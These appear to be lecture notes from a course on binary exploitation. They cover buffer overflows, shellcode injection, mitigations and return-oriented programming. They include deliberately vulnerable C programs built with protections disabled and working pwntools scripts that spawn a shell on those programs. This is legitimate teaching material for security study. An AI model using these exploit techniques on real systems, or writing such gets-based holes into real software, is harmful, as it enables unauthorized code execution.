Binary Exploitation: Shellcode, Mitigations, ROP

Cool Security People of the Day (CSPoD)

• Quarkslab: Known for informative blog posts.
  • Example: Mifare Classic encrypted nonce and backdoors
• Luna: Renowned security expert and CTF player, associated with pwn.cat

The BOF Strikes Back

• Previous Topic: Buffer overflow and ret2win attack.
• Challenges:
  • Buffer overflow on stack via gets.
  • Overwriting the return address of the stack frame.
• Example Code: #include <stdio.h> #include <string.h> #include <stdlib.h> void win() { printf("How did you get here? I don't know whether to hire or fire you..."); execve("/bin/sh", 0, 0); } void main() { char buffer[32]; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? "); gets(buffer); printf("Thanks, we received your input: %s\n", buffer); }

New Challenge

• Without a win function: #include <stdio.h> #include <string.h> #include <stdlib.h> void stuff() { asm volatile ("jmp *%%rsp;" :::); } void main() { char buffer[32]; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? "); gets(buffer); printf("Thanks, we received your input: %s\n", buffer); }
• Compilation Command: gcc pwnme.c -o pwnme -zexecstack -fno-stack-protector -no-pie

Shellcode

• Goal: Inject assembly into the program for shell execution.
• Gadgets:
  • Snippets of code utilized post-buffer overflow exploitation.
  • Use ropper to find gadgets.
  • Importance of finding writable and executable memory locations.
  • Jumping to stack with jmp rsp.

Shellcode Implementation

• Tools: pwntools, shellstorm, and other one-off tools.
• Example Solve Script: from pwn import * context.arch = "amd64" p = process("./pwnme") gdb.attach(p) payload = b"Z" * 40 + p64(0x40117e) + asm(shellcraft.sh()) p.sendline(payload) p.interactive()

Mitigations

• Challenges with gets: No proper use case, rampant in C programs.
• Compiler Warnings and Mitigations:
  • Use of flags like zexecstack, fno-stack-protector, no-pie.
  • NX bits/W^X: Enforces write OR execute permissions.
• Real World Examples: Sudo utility vulnerabilities, D-Link router issues.

ROP (Return Oriented Programming)

• Concept:
  • Utilize a sequence of gadgets.
  • Programmatically align gadgets using returns or jumps.
• Calling Conventions: Registers used for function arguments.
• GOT (Global Offset Table) and PLT (Procedure Linkage Table): Facilitate external library function calls.
• Example ROP Solve Script: from pwn import * context.arch = "amd64" p = process("./pwnme2") pop_rdi = 0x401293 binsh = 0x404060 system_plt = 0x000000401070 alignment_ret = 0x000000000040122d payload = b"F" * 40 + p64(alignment_ret) + p64(pop_rdi) + p64(binsh) + p64(system_plt) p.sendline(payload) p.interactive()

Summary

• Topics Covered: Shellcode injection, ROP techniques, exploitation mitigations.
• Next Topics: Leaks, ASLR, and more binary exploitation techniques.